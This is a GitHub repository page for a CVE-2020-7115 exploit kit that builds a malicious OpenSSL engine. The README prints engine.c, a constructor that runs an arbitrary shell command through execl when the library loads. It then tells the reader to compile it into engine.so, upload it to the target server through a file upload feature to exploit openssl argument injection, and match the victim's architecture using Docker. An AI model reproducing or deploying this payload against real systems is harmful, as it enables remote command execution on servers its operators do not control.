Skip to content

Retr02332/CVE-2020-7115

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits

output

output

 
 

README.md

README.md

 
 

build_engine.sh

build_engine.sh

 
 

engine.c

engine.c

 
 

Repository files navigation

CVE-2020-7115

Create your malicious engine in seconds

build_engine.sh

Simple script to generate a malicious engine ready to be used in openssl argument injection scenarios.

How to use?

It's very simple, just modify the engine.c file with the command of your choice:

#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "COMMAND");
}

Once you have done that, now you just need to run the script like this:

bash build_engine.sh

This command will create a folder called output, in it you will find a file called engine.so which is the one you should send to the server through a file upload functionality.

How to raise a docker to run the script and why should I do it?

It is important for you to know that you must create the malicious engine with the same characteristics of the victim system. That is... if the target system is running on a 64-bit linux, you must create the malicious engine on a 64-bit linux.

Docker is an amazing technology for this kind of thing, and setting up your environment is very easy.

First let's download the docker image from this site for a 64-bit debian linux system:

sudo docker pull debian

Then we are going to pull up the docker as follows:

sudo docker run -v `pwd`:/code -it debian

Let's understand a little what we did here. The -v flag is used to create a volume, in this case we are associating the contents of the /code folder with the contents of our current directory folder, hence the use of pwd.

With associate I mean that everything that we create or edit in /code (folder that is hosted in the root of the docker image), we will have and we will see it in pwd and in the opposite direction.

In our case, pwd points to the following directory on our local machine:

/home/retr0/CVE-2020-7115/

The -it flag, on the other hand, can be seen as follows:

The -t (--tty) flag tells Docker to map a virtual terminal session inside the container. This is commonly used with the -i (--interactive) option, which keeps STDIN open even if running in detached mode.

So in effect using the -it flag is useful when we want to get a shell from the container in question.

Don't know the CVE-2020-7115?

No problem, just visit this post, and I am sure you will fully understand this vulnerability.

About

Create your malicious engine in seconds

Resources

Readme
Activity

Stars

2 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages